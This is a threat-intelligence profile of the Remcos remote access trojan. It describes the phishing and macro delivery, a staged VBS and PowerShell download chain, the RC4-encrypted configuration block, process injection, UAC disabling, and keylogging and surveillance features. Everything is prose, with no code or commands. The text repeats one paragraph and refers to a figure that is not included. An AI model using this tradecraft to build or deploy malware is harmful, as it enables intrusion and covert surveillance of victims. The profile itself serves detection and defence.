| Name | Remcos |
| Type of Malware | RAT |
| Date of Initial Activity | 2016 |
| Associated Groups | Gorgon Group, LazyScripter |
| Motivation | Run keyloggers and surveillance (audio + screenshots) mode to steal accounts, sentitive information, and cryptocurrencies, and Follow-On Infections |
| Attack Vectors | Phishing emails, Infected email attachments (PDFs and Office documents), |
| Targeted System | Windows |
Overview
Remcos is a RAT that first appeared in the wild in 2016. Remcos distributes itself through malicious Microsoft Office documents, which are attached to SPAM emails, and is designed to bypass Microsoft Windowss UAC security and execute malware with high-level privileges.
The Remcos malware is actually a legitimate tool sold by a German Company named Breaking Security under the name Remote Control and Surveillance and is commonly abused by hackers.
Targets
Targets Regular Users.
Tools/ Techniques Used
After infecting a computer, Remcos provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos is commonly deployed via a phishing attack. The malware may be embedded in a malicious ZIP file masquerading as a PDF that claims to contain an invoice or order. Alternatively, the malware has also been deployed using Microsoft Office documents and malicious macros that unpack and deploy the malware.
To evade detection, Remcos uses process injection or process hollowing, which enables it to run inside a legitimate process. The malware also deploys persistence mechanisms and runs in the background to hide from users. As a RAT, command and control (C2) is a core capability of Remcos malware. The malicious traffic is encrypted en route to the C2 server, and the attacker uses Distributed DNS to create a variety of domains for C2 servers.
This makes it possible for the malware to defeat protections that rely on filtering traffic to known malicious domains. Once the attached Excel document is opened in the Excel program, it asks for a password to view the document, which has already been provided in the email. Because the file contains Macro code, it shows a yellow security warning bar to warn the victim of the danger. The file message lures the victim into clicking the Enable Content button to bypass the warning and execute the malicious macro code.
The macro has a function called “Wookbook_Active()” that is called automatically when it opens. Its task is to extract VBS code from the cells into a file “%AppData%\HobYQ.vbs” and then execute it. To protect the Remcos payload file, it uses a super sophisticated way to download it.
In this way, it executes both VBS and PowerShell script codes. “HobYQ.vbs” runs a segment of dynamically spliced PowerShell code to download another VBS file (“flip.vbs”) from the attacker’s server and run it. Next, “flip.vbs” continues to download a file (called “mem.txt”) from the server, which is a piece of encoded VBS code that will be executed later in “flip.vbs” to download the final file from the same server, which is called “faze.jpg”.
Every Remcos contains an RC4 encrypted configuration block in its PE resource section, named “SETTINGS” as shown in Figure 8, where the first byte “B1” is the size of the following RC4 key that is in a red box and the rest data is the encrypted Remcos configuration block.
The first thing Remcos does is to decrypt the configuration block, which will be referred to throughout Remcos lifetime. It contains but not limited to the C2’s server information, Remcos assigned name for attacker to recognize the victim, Remcos sub-key name in registry, the name of log file for recording victim’s keylogger and clipboard data, many flags telling Remcos how to start its features in the victim’s device, as well as the authentication data used to establish connection to the C2 server.
The workflow of Remcos is very clear that it starts many threads to perform auto-start work according to the flags defined in the configuration block. It includes: Adding Remcos to the auto-run group in the system registry Starting a watchdog program (Remcos’ daemon program) Recording the victim’s audio input from an input device ( microphone) Capturing victim’s screenshots at startup Disabling UAC (User Account Control) on the victim’s device.
Remcos Malware Capabilities
The Remcos malware is actually a legitimate tool sold by a German Company named Breaking Security under the name Remote Control and Surveillance and is commonly abused by hackers. Some of the key capabilities of the malware include:
- Privilege Elevation: Remcos can gain Administrator permissions on an infected system and disable User Account Control (UAC). This makes it easier for the attacker to execute malicious functionality.
- Defense Evasion: Remcos uses process injection to embed itself within legitimate processes, making it more difficult for antivirus to detect. Additionally, the malware can run in the background to hide itself from users.
- Data Collection: One of the core capabilities of the Remcos malware is to collect information about the user of a computer. It can log keystrokes, capture screenshots, audio, and clipboard contents, and collect passwords from the infected system.
Impact / Significant Attacks
Operation Spalax.
